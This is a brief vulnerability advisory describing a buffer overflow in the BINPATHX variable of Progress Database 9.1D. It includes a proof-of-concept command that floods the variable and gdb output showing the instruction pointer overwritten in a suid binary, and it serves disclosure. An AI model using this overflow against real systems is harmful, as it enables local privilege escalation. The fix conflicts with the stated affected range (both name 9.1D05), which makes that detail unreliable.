COMMAND

	Progress Database unchecked buffer in BINPATHX leads to overflow

SYSTEMS AFFECTED

	v9.1D up to 9.1D05

PROBLEM

	In  Secure  Network  Operations,  Inc.  Strategic  Reconnaissance   Team
	advisory SRT2003-04-15-1029 [http://www.secnetops.com]:
	
	With version 9.1D several things have changed in the Progress  codebase.
	One such change is the addition of the BINPATHX variable. At  the  first
	glance the BINPATHX variable appears to tell Progress binaries where  to
	find shared library files and other  installation  files.  Unfortunately
	while reading the variable no bounds checking is done.  If  an  attacker
	supplies enough data an overflow will occur  thus  overwriting  critical
	memory registers including the eip.
	
	Debugger output
	
	
	rootme@gentoo rootme $ export BINPATHX=`perl -e 'print "A" x 240'`
	rootme@gentoo rootme $ gdb -q /usr/dlc/bin/_proapsv
	(gdb) r
	Starting program: /usr/dlc/bin/_proapsv
	
	Program received signal SIGSEGV, Segmentation fault.
	0x41414141 in ?? ()
	(gdb) bt
	#0  0x41414141 in ?? ()
	Cannot access memory at address 0x41414141
	

SOLUTION

	install 9.1D05 or chmod -s all suid binaries
	
	
	http://www.progress.com/patches/patchlst/91D-156v.htm